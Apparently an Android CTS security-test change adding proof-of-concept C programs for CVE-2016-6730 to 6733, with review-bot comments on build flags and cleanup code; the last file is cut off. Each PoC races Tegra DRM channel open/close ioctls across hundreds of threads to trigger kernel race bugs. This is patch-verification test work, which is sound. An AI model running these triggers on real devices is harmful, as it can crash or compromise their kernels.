+LOCAL_MODULE := CVE-2016-6730
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
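Review bot: The warning and hardening flags at the end of this file are appended to `CFLAGS` and `LDFLAGS`, which the Android.mk module rules do not read as far as I can tell. Only `LOCAL_`-prefixed variables are per-module inputs, so `-Wall`, `-D_FORTIFY_SOURCE=2` and `-rdynamic` are likely never passed to the compiler or linker. Write them as `LOCAL_CFLAGS += -Wall -W -g -O2 ...` and `LOCAL_LDFLAGS += -rdynamic`, as the file already does for `LOCAL_LDFLAGS += -fPIE -pie`. The Android.mk files for CVE-2016-6731, CVE-2016-6732 and CVE-2016-6733 repeat the same lines. Expect new warnings from poc.c once the flags take effect, for instance for unused labels and parameters.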
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6730/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6730/poc.c
new file mode 100644
index 0000000..bfcdb41
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6730/poc.c
@@ -0,0 +1,164 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define CLK_THREAD_NUM 900
+#define TRY_TIMES CLK_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_GET_CLK_CONSTRAINT 0x12
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_constraint {
+ __u64 context;
+ __u32 index;
+ __u32 type;
+ __u32 rate;
+ __u32 pad;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_GET_CLK_CONSTRAINT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GET_CLK_CONSTRAINT, struct drm_tegra_constraint)
+int fd;
+pthread_t clk_thread_id[CLK_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_constraint clk_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* clk_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_GET_CLK_CONSTRAINT, &clk_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ ret = pthread_create(clk_thread_id + i, NULL, clk_thread, NULL);
+ if(ret){
+ goto out_clk_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set clk */
+ clk_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_clk_thread:
+ /* kill clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ pthread_kill(clk_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
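Review bot: The cleanup loop at `out_clk_thread` calls `pthread_kill(clk_thread_id[i], SIGKILL)`, but SIGKILL cannot be delivered to a single thread: it terminates the whole process, so `close(fd)` and `return 0` are not reached and the binary exits by signal. On the `goto out_clk_thread` path after a failed `pthread_create`, the loop also passes never-initialised thread ids to `pthread_kill`. Returning from `main` already ends every thread, so the loop can be dropped, leaving `out_clk_thread: close(fd); return 0;`. The poc.c files for CVE-2016-6731 and CVE-2016-6732 end with the same loop. This file also has no header comment saying which driver path it exercises or what result the host test expects on a patched device.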
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6731/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6731/Android.mk
new file mode 100644
index 0000000..718dbe3
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6731/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6731
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6731/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6731/poc.c
new file mode 100644
index 0000000..d6cedfb
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6731/poc.c
@@ -0,0 +1,165 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define CLK_THREAD_NUM 900
+#define TRY_TIMES CLK_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SET_CLK_CONSTRAINT 0x13
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_constraint {
+ __u64 context;
+ __u32 index;
+ __u32 type;
+ __u32 rate;
+ __u32 pad;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SET_CLK_CONSTRAINT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SET_CLK_CONSTRAINT, struct drm_tegra_constraint)
+int fd;
+pthread_t clk_thread_id[CLK_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_constraint clk_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* clk_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_SET_CLK_CONSTRAINT, &clk_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ ret = pthread_create(clk_thread_id + i, NULL, clk_thread, NULL);
+ if(ret){
+ goto out_clk_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set clk */
+ clk_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+ puts("ran 1");
+out_clk_thread:
+ /* kill clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ pthread_kill(clk_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ puts("ran 2");
+ return 0;
+}
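Review bot: `puts("ran 1")` and `puts("ran 2")` look like leftover debug output; the other PoCs visible in this change print nothing, so if the host test does not parse these markers they should be removed. `"ran 2"` is also unlikely ever to be printed, because the `pthread_kill(..., SIGKILL)` loop before it terminates the whole process. If the markers are meant for the host test, a comment saying so would help.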
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6732/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6732/Android.mk
new file mode 100644
index 0000000..03b7b87
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6732/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6732
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6732/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6732/poc.c
new file mode 100644
index 0000000..5b8ea8e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6732/poc.c
@@ -0,0 +1,158 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define THREAD_NUM 900
+#define TRY_TIMES 900
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+
+int fd;
+pthread_t thread_id[THREAD_NUM] = { 0 };
+int thread_ret[THREAD_NUM] = { 0 };
+int futex_signal = 0;
+
+struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* child(void* no_use)
+{
+ int ret = 1;
+ set_affinity(1);
+
+ while(ret){
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ thread_ret[i] = pthread_create(thread_id + i, NULL, child, NULL);
+ }
+
+ while(try_time--){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret){
+ }else{
+ }
+ /* close */
+ close_c.context = open_c.context;
+
+ /* swtich to child */
+ usleep(500);
+ }
+
+out_thread:
+ /* kill thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ if(!thread_ret[i]){
+ pthread_kill(thread_id[i], SIGKILL);
+ }
+ }
+
+out_close:
+ close(fd);
+ return 0;
+}
+
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6733/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6733/Android.mk
new file mode 100644
index 0000000..7b02188
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6733/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6733
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
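Review bot: The four `CFLAGS +=` lines and `LDFLAGS += -rdynamic` assign plain make variables, which the Android module build does not, as far as I know, take as per-module input; only the `LOCAL_`-prefixed variables are read. As written, `-D_FORTIFY_SOURCE=2` and the `-W…` set probably never reach the compiler for poc.c. I would write them as `LOCAL_CFLAGS += -Wall -W -g -O2 …` and `LOCAL_LDFLAGS += -rdynamic`. `-Iinclude` also names a directory that this change does not appear to add. The Android.mk files for CVE-2016-6734, CVE-2016-6735, CVE-2016-6736, CVE-2016-8412 and CVE-2016-8424 repeat the same lines.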
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6733/local_pwn.h b/hostsidetests/security/securityPatch/CVE-2016-6733/local_pwn.h
new file mode 100644
index 0000000..1c1dde9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6733/local_pwn.h
@@ -0,0 +1,62 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __local_pwn_H__
+#define __local_pwn_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+
+#endif
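Review bot: This header looks unused: the Android.mk beside it builds only `poc.c`, and that file has no `#include "local_pwn.h"` but repeats every definition found here. Either include the header from poc.c and delete the copies, or drop the header, so the ioctl layout is kept in one place. If it stays, it should pull in what it uses (`#include <linux/types.h>` for `__u32`/`__u64`, `<sys/ioctl.h>` for `_IOWR`) and open with a comment such as `/* Tegra DRM channel ioctl definitions used by the CVE-2016-6733 test */`. The `SIOCIWFIRSTPRIV` and `PRIV_CMD_*` macros are not referenced by anything in this test and could go.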
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6733/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6733/poc.c
new file mode 100644
index 0000000..7980fc9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6733/poc.c
@@ -0,0 +1,158 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+#define THREAD_NUM 900
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+
+int fd;
+pthread_t thread_id[THREAD_NUM] = { 0 };
+int thread_ret[THREAD_NUM] = { 0 };
+int futex_signal = 0;
+
